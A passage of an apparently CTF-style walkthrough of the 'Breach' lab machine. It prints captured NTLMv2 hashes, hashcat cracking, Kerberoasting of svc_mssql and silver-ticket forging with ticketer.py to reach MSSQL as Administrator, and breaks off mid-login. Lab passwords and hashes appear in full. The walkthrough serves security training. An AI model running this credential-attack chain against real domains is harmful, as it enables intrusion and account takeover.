-0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:8ce316fe63bbff68:7C83F0E61F78F9846819C3B948276CAF:010100000000000080E6583190EBDC01932D49C28AE8C18D000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:e12f3b9dfbb7d4ae:815350FE8EBEC44476CF77066A2D671D:010100000000000080E6583190EBDC01158D23F47AB455B5000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:4d93eb2355edabf4:C9489EF4B2789B70AA57E78160654A24:010100000000000080E6583190EBDC0199DD0DEA25210F3A000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:d5ad639acd376383:AA7606490EF36F54B74C24D36418EA50:010100000000000080E6583190EBDC01AC0B5313EADD0B9F000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:8fad973e9cefc7d9:202E318DCFB9DD5A7A359DDFC45E1034:010100000000000080E6583190EBDC01A2134B5E10D773A9000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:eacc521d18d72df9:C8005E93DF3B60E038C58D0E2AA2A771:010100000000000080E6583190EBDC01337AA383261EF25C000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:2485b7e3d5dd40d1:B137E840AEEB47FA348F802699E341EC:010100000000000080E6583190EBDC01759639589DAA7BBB000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:5df4cc9bfc87d71e:0834441C7254FA596B34DE30541AE82D:010100000000000080E6583190EBDC013671F75EB88D0918000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:6040ee7d08ecfe90:3B0E1F4337F0167102BC65E68831F6E6:010100000000000080E6583190EBDC01D5A94FA5C295D2F7000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -[SMB] NTLMv2-SSP Client   : 10.129.2.189 -[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong -[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:9c65145efadfe28f:0AAD5C4A7D8B3936FB36AB5699E29A2E:010100000000000080E6583190EBDC01606BA70AE7A661E5000000000200080037004B004600480001001E00570049004E002D00380044003 -800510048005A0039004800320057004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B0 -0460048002E004C004F00430041004C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A0010000000000000000000000000000 -00000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 -``` - -We take the very last one : - -```bash -> nano /tmp/julia_clean.hash -> cat /tmp/julia_clean.hash -Julia.Wong::BREACH:e9f17a081f69f2b8:C996FA7E1F3FE2AE577E0925156B4F1E:010100000000000080E6583190EBDC0108670B5B2086C31D000000000200080037004B004600480001001E00570049004E002D00380044003800510048005A003900480032005 -7004B0004003400570049004E002D00380044003800510048005A0039004800320057004B002E0037004B00460048002E004C004F00430041004C000300140037004B00460048002E004C004F00430041004C000500140037004B00460048002E004C004F004300410 -04C000700080080E6583190EBDC010600040002000000080030003000000000000000010000000020000063C5753E55AE1F590F4D7512E9879D4DEA1672E699407A3FA7F6821B29FFF20C0A00100000000000000000000000000000000000090020006300690066007 -3002F00310030002E00310030002E00310034002E00310032000000000000000000 - ->  hashcat -m 5600 /tmp/julia_clean.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt - -hashcat (v7.1.2) starting - -OpenCL API (OpenCL 3.0 PoCL 7.1  Linux, Release, RELOC, LLVM 20.1.8, SLEEF, DISTRO, CUDA, POCL_DEBUG) - Platform #1 [The pocl project] -====================================================================================================================================== -* Device #01: cpu-haswell-AMD Ryzen 5 3500U with Radeon Vega Mobile Gfx, 8912/17824 MB (8912 MB allocatable), 8MCU - -Minimum password length supported by kernel: 0 -Maximum password length supported by kernel: 256 -Minimum salt length supported by kernel: 0 -Maximum salt length supported by kernel: 256 - -Hashes: 1 digests; 1 unique digests, 1 unique salts -Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates -Rules: 1 - -Optimizers applied: -* Zero-Byte -* Not-Iterated -* Single-Hash -* Single-Salt - -ATTENTION! Pure (unoptimized) backend kernels selected. -Pure kernels can crack longer passwords, but drastically reduce performance. -If you want to switch to optimized kernels, append -O to your commandline. -See the above message to find out about the exact limits. - -Watchdog: Temperature abort trigger set to 90c - -Host memory allocated for this attack: 514 MB (14200 MB free) - -Dictionary cache hit: -* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -* Passwords.: 14344384 -* Bytes.....: 139921497 -* Keyspace..: 14344384 - -JULIA.WONG::BREACH:e9f17a081f69f2b8:c996fa7e1f3fe2ae577e0925156b4f1e:010100000000000080e6583190ebdc0108670b5b2086c31d000000000200080037004b004600480001001e00570049004e002d00380044003800510048005a003900480032005 -7004b0004003400570049004e002d00380044003800510048005a0039004800320057004b002e0037004b00460048002e004c004f00430041004c000300140037004b00460048002e004c004f00430041004c000500140037004b00460048002e004c004f004300410 -04c000700080080e6583190ebdc010600040002000000080030003000000000000000010000000020000063c5753e55ae1f590f4d7512e9879d4dea1672e699407a3fa7f6821b29fff20c0a00100000000000000000000000000000000000090020006300690066007 -3002f00310030002e00310030002e00310034002e00310032000000000000000000:Computer1 -                                                           -Session..........: hashcat -Status...........: Cracked -Hash.Mode........: 5600 (NetNTLMv2) -Hash.Target......: JULIA.WONG::BREACH:e9f17a081f69f2b8:c996fa7e1f3fe2a...000000 -Time.Started.....: Sun May 24 15:49:50 2026 (0 secs) -Time.Estimated...: Sun May 24 15:49:50 2026 (0 secs) -Kernel.Feature...: Pure Kernel (password length 0-256 bytes) -Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) -Guess.Queue......: 1/1 (100.00%) -Speed.#01........:  1390.9 kH/s (3.79ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 -Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) -Progress.........: 122880/14344384 (0.86%) -Rejected.........: 0/122880 (0.00%) -Restore.Point....: 114688/14344384 (0.80%) -Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1 -Candidate.Engine.: Device Generator -Candidates.#01...: 022579 -> money89 -Hardware.Mon.#01.: Temp: 71c Util: 35% - -Started: Sun May 24 15:49:20 2026 -Stopped: Sun May 24 15:49:52 2026 -``` - -Cracked ! `JULIA.WONG:Computer1` - -We now get to the /share directory and extract from transfer (where we put the URL and where julia.wong was) the user.txt file, as indicated in the `Adventure Mode` (Black Box Mode on HTB) : "`The User flag for this Box is located in a non-standard directory, C:\share\transfer.`" just before `Submit User Flag` and `Submit Root Flag`. - -```bash ->  smbclient //10.129.2.189/share -U 'JULIA.WONG%Computer1' -c 'get transfer\\JULIA.WONG\\user.txt user.txt exit' -getting file \transfer\JULIA.WONG\user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) ->  cat user.txt -55d33e52**************cfa103dda% -``` - -We remove the dirty % and we got the user flag : 55d33*************03dda - -Now, we'll get into Julia Wong's computer, trying to find ways to privesc. - -```bash ->  evil-winrm -i 10.129.2.189 -u 'julia.wong' -p 'Computer1' -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -*Evil-WinRM* PS C:\> dir - -                                         -Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError -                                         -Error: Exiting with code 1 -> -``` - -That failed spectacularly. - -```bash ->  GetUserSPNs.py 'breach.vl/julia.wong:Computer1' -request - -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation   ---------------------------------  ---------  --------  --------------------------  --------------------------  ---------- -MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 11:43:08.106169  2026-05-24 14:20:04.997550               - - - -[-] CCache file is not found. Skipping... -$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$6e2ebef1d6e171c1d7e27c00522a410c$6a12191cde59b99b1a92f418114e373162abc3eea63b0f14b8ecbfdad43f4d485d30e2f1d0d33fd6b0694b810adcdea9844aa6de24d240a296288092fcc -8d29e4f86d57091892f4a2617b0608f2a4ea106839b311aa2b459912708533db53c30f931a92c9d5bb9c49be4105e221cd7f7e0477a7ea35e228d6e37b9e45398c717e2846b969ca933e93a2c66cca02549f04a7b56d7ba90dfbd8b60581471d0c2b33b6a3ad7a8036 -eae1b3556ed7d6e393fb29fa52f2a836a537c538a6aefcd3ce30b1a18b27fe38db349ec299d7a3e1efa7bcc8c25f6a2bf82a46eee139a2fdb15c393e977881e8dee27e3f553d397661eb94d15bd12eec32d171278a00e377b7edab9e35a465ff9012f5d9f79ba5fc8d -cb5e88f0a512b0b8a459bba2b58bb99505913c8b4d8474f0b2f7d2915f6a2a3851b7d691d8823de116b19f2406cd74eb8e789f958db65cfeddc7faeeee5f0b946c0bff12545cb6760c938e5b6c78558fe88cc2c9a8d49e8707cd81143865930f543d3f74a7b8c077fd -8bf137a1387a393d48fed7ffa7a9bc0ec5d2b8256548549f2c1034d438792d81134b2adf8bf81a9cee287498996e9d93b9917bae1b88d33b2af7cb763ac0907a27dc3bd3fc46595224a354d2cd5e9903809c16486e1b489b638ab278496a23c2b461e59c13cd3562b9 -95da045531eaf273d45040059e25f8b74cdaa928b097ee585388c7d55fbc7615563f4c9e6588bcf01b4956c280a2fd3be0b28d68858dc90c4556df06267147c0951cb714e83f4efe3e63e5f56db9069d512a3f67efda7041cdb404e4ce80d5fdf9e4f15cee3de5c11c -c376a0815d5471479d1950e61686ea2d60363864261c08c11524e60c62466f2d20a71c231820c8bb70d7eb0877d0268797edf78fcf8b795af2482299c35995301a346f41dd9ffd24f8492055ad224dc03fcb48a7bb86bae91b2639d296b9715e0bc71cd90cd78cad61 -a76f922cae1703c32bb7d4b92edfee491323dfde7057ba4be69bb68b58f953f4be62860c4614233c0b34eeb9f1b1a5a81dbfa15263ae03b69a6ad2161fcc6ffaa4f2194ceef08b2452505b16a5fbb5f232a943d994287f98914c3d08d3c3eee11298ee64799e324b99 -96ff1b8fe82738bf8f2d598835469f58bc9a1e924fbd2227a75dea5c9cad5f8d85858efdd0ee6c64d7ec21604a892c0a8c7f0e042d1f4fcaac1aaa36f373d581542a5ae2d6ab1178b264530cfebc4c949040b9d088bcc345f251dc27148a05d4a077a9cc720d873aac -ab82381d8b1e05ee1e2c4f20003c6f27c5118c811df398d276098ee918f2c45508d553c414c58954389b9b6e287756a8f2a1f7c5800f5304d929b714b9df665750f8696936f8701316871dbb107af20ebe10c685999665a399d0393265b927366e68ac7b6c8d1464fb -a253cd587dd289a0fb4353482213fb858dde3519565daebaea1bd019d4d672ba290ef233c6d -``` - -We found `svc_mssql` with a `krb5tgs` hash, hinting for a Kerberos ticket. - -From nmap : `1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM` - -This might be the way to privesc. So we pivot from local to trying to get access to port 1433. - -```bash ->  nano /tmp/svchash.txt ->  hashcat -m 13100 /tmp/svchash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -O -hashcat (v7.1.2) starting - -OpenCL API (OpenCL 3.0 PoCL 7.1  Linux, Release, RELOC, LLVM 20.1.8, SLEEF, DISTRO, CUDA, POCL_DEBUG) - Platform #1 [The pocl project] -====================================================================================================================================== -* Device #01: cpu-haswell-AMD Ryzen 5 3500U with Radeon Vega Mobile Gfx, 8912/17824 MB (8912 MB allocatable), 8MCU - -Minimum password length supported by kernel: 0 -Maximum password length supported by kernel: 31 -Minimum salt length supported by kernel: 0 -Maximum salt length supported by kernel: 51 - -Hashes: 1 digests; 1 unique digests, 1 unique salts -Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates -Rules: 1 - -Optimizers applied: -* Optimized-Kernel -* Zero-Byte -* Not-Iterated -* Single-Hash -* Single-Salt - -Watchdog: Temperature abort trigger set to 90c - -Host memory allocated for this attack: 514 MB (14525 MB free) - -Dictionary cache hit: -* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -* Passwords.: 14344384 -* Bytes.....: 139921497 -* Keyspace..: 14344384 - -$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$6e2ebef1d6e171c1d7e27c00522a410c$6a12191cde59b99b1a92f418114e373162abc3eea63b0f14b8ecbfdad43f4d485d30e2f1d0d33fd6b0694b810adcdea9844aa6de24d240a296288092fcc -8d29e4f86d57091892f4a2617b0608f2a4ea106839b311aa2b459912708533db53c30f931a92c9d5bb9c49be4105e221cd7f7e0477a7ea35e228d6e37b9e45398c717e2846b969ca933e93a2c66cca02549f04a7b56d7ba90dfbd8b60581471d0c2b33b6a3ad7a8036 -eae1b3556ed7d6e393fb29fa52f2a836a537c538a6aefcd3ce30b1a18b27fe38db349ec299d7a3e1efa7bcc8c25f6a2bf82a46eee139a2fdb15c393e977881e8dee27e3f553d397661eb94d15bd12eec32d171278a00e377b7edab9e35a465ff9012f5d9f79ba5fc8d -cb5e88f0a512b0b8a459bba2b58bb99505913c8b4d8474f0b2f7d2915f6a2a3851b7d691d8823de116b19f2406cd74eb8e789f958db65cfeddc7faeeee5f0b946c0bff12545cb6760c938e5b6c78558fe88cc2c9a8d49e8707cd81143865930f543d3f74a7b8c077fd -8bf137a1387a393d48fed7ffa7a9bc0ec5d2b8256548549f2c1034d438792d81134b2adf8bf81a9cee287498996e9d93b9917bae1b88d33b2af7cb763ac0907a27dc3bd3fc46595224a354d2cd5e9903809c16486e1b489b638ab278496a23c2b461e59c13cd3562b9 -95da045531eaf273d45040059e25f8b74cdaa928b097ee585388c7d55fbc7615563f4c9e6588bcf01b4956c280a2fd3be0b28d68858dc90c4556df06267147c0951cb714e83f4efe3e63e5f56db9069d512a3f67efda7041cdb404e4ce80d5fdf9e4f15cee3de5c11c -c376a0815d5471479d1950e61686ea2d60363864261c08c11524e60c62466f2d20a71c231820c8bb70d7eb0877d0268797edf78fcf8b795af2482299c35995301a346f41dd9ffd24f8492055ad224dc03fcb48a7bb86bae91b2639d296b9715e0bc71cd90cd78cad61 -a76f922cae1703c32bb7d4b92edfee491323dfde7057ba4be69bb68b58f953f4be62860c4614233c0b34eeb9f1b1a5a81dbfa15263ae03b69a6ad2161fcc6ffaa4f2194ceef08b2452505b16a5fbb5f232a943d994287f98914c3d08d3c3eee11298ee64799e324b99 -96ff1b8fe82738bf8f2d598835469f58bc9a1e924fbd2227a75dea5c9cad5f8d85858efdd0ee6c64d7ec21604a892c0a8c7f0e042d1f4fcaac1aaa36f373d581542a5ae2d6ab1178b264530cfebc4c949040b9d088bcc345f251dc27148a05d4a077a9cc720d873aac -ab82381d8b1e05ee1e2c4f20003c6f27c5118c811df398d276098ee918f2c45508d553c414c58954389b9b6e287756a8f2a1f7c5800f5304d929b714b9df665750f8696936f8701316871dbb107af20ebe10c685999665a399d0393265b927366e68ac7b6c8d1464fb -a253cd587dd289a0fb4353482213fb858dde3519565daebaea1bd019d4d672ba290ef233c6d:Trustno1 -                                                           -Session..........: hashcat -Status...........: Cracked -Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) -Hash.Target......: $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssq...233c6d -Time.Started.....: Sun May 24 16:23:02 2026 (0 secs) -Time.Estimated...: Sun May 24 16:23:02 2026 (0 secs) -Kernel.Feature...: Optimized Kernel (password length 0-31 bytes) -Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt) -Guess.Queue......: 1/1 (100.00%) -Speed.#01........:  1246.6 kH/s (3.73ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 -Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) -Progress.........: 57345/14344384 (0.40%) -Rejected.........: 1/57345 (0.00%) -Restore.Point....: 49153/14344384 (0.34%) -Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1 -Candidate.Engine.: Device Generator -Candidates.#01...: trini1 -> Whitney -Hardware.Mon.#01.: Temp: 69c Util: 16% - -Started: Sun May 24 16:22:35 2026 -Stopped: Sun May 24 16:23:03 2026 -``` - -Cracked ! `svc_mssql:Trustno1` - -```bash ->  netexec mssql breachdc.breach.vl -u svc_mssql -p 'Trustno1' -MSSQL       10.129.2.189    1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (EncryptionReq:False) -MSSQL       10.129.2.189    1433   BREACHDC         [+] breach.vl\svc_mssql:Trustno1 - ->  mssqlclient.py 'breach.vl/svc_mssql:Trustno1'@BREACHDC.breach.vl -windows-auth - -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Encryption required, switching to TLS -[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master -[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english -[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'. -[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english. -[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000) -[!] Press help for extra shell commands -SQL (BREACH\svc_mssql  guest@master)> SELECT SYSTEM_USER; -                    -----------------     -BREACH\svc_mssql     -SQL (BREACH\svc_mssql  guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin'); -     --     -0     -``` - -We do not have sysadmin privileges on mssql. - -We'll try using bloodhound-python to collect everything (hopefully a ticket) using the local user and the ms-sql domain. - -```bash ->  bloodhound-python -d breach.vl -u 'julia.wong' -p 'Computer1' -dc 'BREACHDC.breach.vl' -c all -ns 10.129.2.189 --dns-tcp - -INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) -INFO: Found AD domain: breach.vl -INFO: Getting TGT for user -INFO: Connecting to LDAP server: BREACHDC.breach.vl -INFO: Testing resolved hostname connectivity dead:beef::dd58:a50d:1569:999d -INFO: Trying LDAP connection to dead:beef::dd58:a50d:1569:999d -INFO: Testing resolved hostname connectivity dead:beef::f4 -INFO: Trying LDAP connection to dead:beef::f4 -INFO: Found 1 domains -INFO: Found 1 domains in the forest -INFO: Found 1 computers -INFO: Connecting to LDAP server: BREACHDC.breach.vl -INFO: Testing resolved hostname connectivity dead:beef::dd58:a50d:1569:999d -INFO: Trying LDAP connection to dead:beef::dd58:a50d:1569:999d -INFO: Testing resolved hostname connectivity dead:beef::f4 -INFO: Trying LDAP connection to dead:beef::f4 -INFO: Found 15 users -INFO: Found 54 groups -INFO: Found 2 gpos -INFO: Found 2 ous -WARNING: Re-establishing connection with server -INFO: Connecting to LDAP server: BREACHDC.breach.vl -INFO: Testing resolved hostname connectivity dead:beef::dd58:a50d:1569:999d -INFO: Trying LDAP connection to dead:beef::dd58:a50d:1569:999d -INFO: Testing resolved hostname connectivity dead:beef::f4 -INFO: Trying LDAP connection to dead:beef::f4 -ERROR: Failed to resolve LDAP server IP -ERROR: Connection to LDAP server lost during data gathering - reconnect failed - giving up on query (|(objectClass=container)(objectClass=organizationalUnit)(sAMAccountType=805306369)(objectClass=group)(&(objec -tCategory=person)(objectClass=user))) -WARNING: Re-establishing connection with server -INFO: Connecting to LDAP server: BREACHDC.breach.vl -INFO: Testing resolved hostname connectivity dead:beef::dd58:a50d:1569:999d -INFO: Trying LDAP connection to dead:beef::dd58:a50d:1569:999d -INFO: Testing resolved hostname connectivity dead:beef::f4 -INFO: Trying LDAP connection to dead:beef::f4 -ERROR: Failed to resolve LDAP server IP -ERROR: Connection to LDAP server lost during data gathering - reconnect failed - giving up on query (|(objectClass=container)(objectClass=organizationalUnit)(sAMAccountType=805306369)(objectClass=group)(&(objec -tCategory=person)(objectClass=user))) -WARNING: Re-establishing connection with server -INFO: Connecting to LDAP server: BREACHDC.breach.vl -INFO: Testing resolved hostname connectivity dead:beef::dd58:a50d:1569:999d -INFO: Trying LDAP connection to dead:beef::dd58:a50d:1569:999d -INFO: Testing resolved hostname connectivity dead:beef::f4 -INFO: Trying LDAP connection to dead:beef::f4 -INFO: Found 19 containers -INFO: Found 0 trusts -INFO: Starting computer enumeration with 10 workers -INFO: Querying computer: BREACHDC.breach.vl -INFO: Done in 04M 33S - ->  ls -lh *.json 2>/dev/null | head - --rw-r--r-- 1 vagabond vagabond   74 May 24 16:32 20260524163120_computers.json --rw-r--r-- 1 vagabond vagabond  24K May 24 16:32 20260524163120_containers.json --rw-r--r-- 1 vagabond vagabond 3.1K May 24 16:32 20260524163120_domains.json --rw-r--r-- 1 vagabond vagabond 3.9K May 24 16:32 20260524163120_gpos.json --rw-r--r-- 1 vagabond vagabond  81K May 24 16:32 20260524163120_groups.json --rw-r--r-- 1 vagabond vagabond 4.1K May 24 16:32 20260524163120_ous.json --rw-r--r-- 1 vagabond vagabond  35K May 24 16:32 20260524163120_users.json --rw-r--r-- 1 vagabond vagabond 3.7K May 24 16:37 20260524163257_computers.json --rw-r--r-- 1 vagabond vagabond  24K May 24 16:37 20260524163257_containers.json --rw-r--r-- 1 vagabond vagabond 3.1K May 24 16:37 20260524163257_domains.json -``` - -First, we inspect the domains.json file for the Windows Domain SID, then we use `pypykatz` to extract from nvc_mssql a nthash : - -```bash ->  grep -oE 'S-1-5-21-[0-9-]+' 20260524163257_domains.json | head -1 - -S-1-5-21-2330692793-3312915120-706255856 - ->  pypykatz crypto nt Trustno1 - -69596c7aa1e8daee17f8e78870e25a5c -``` - -We got our ticket ingredients, along with the `DNS_Computer_Name: BREACHDC.breach.vl` from `tcp/1433` we got from enumeration. Enumeration is key. - -We can now use `ticketer.py` from Impacket. - -```bash ->  ticketer.py -spn 'MSSQLSvc/BREACHDC.breach.vl:1433' \ -> -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' \                                                           -> -nthash '69596c7aa1e8daee17f8e78870e25a5c' \                                                 -> -domain breach.vl -dc-ip 10.129.2.189 \                                                      -> -user-id 500 Administrator                                                                                                   -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Creating basic skeleton ticket and PAC Infos -[*] Customizing ticket for breach.vl/Administrator -[*]     PAC_LOGON_INFO -[*]     PAC_CLIENT_INFO_TYPE -[*]     EncTicketPart -[*]     EncTGSRepPart -[*] Signing/Encrypting final ticket -[*]     PAC_SERVER_CHECKSUM -[*]     PAC_PRIVSVR_CHECKSUM -[*]     EncTicketPart -[*]     EncTGSRepPart -[*] Saving ticket in Administrator.ccache -``` - -Then, we export the ticket as our KRB5 name to login via mssql as Administrator with no password : - -```bash -> export KRB5CCNAME=Administrator.ccache ->  mssqlclient.py -k -no-pass -windows-auth BREACHDC.breach.vl -Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies   - -[*] Encryption required, switching to TLS -[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master -[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english -[*] 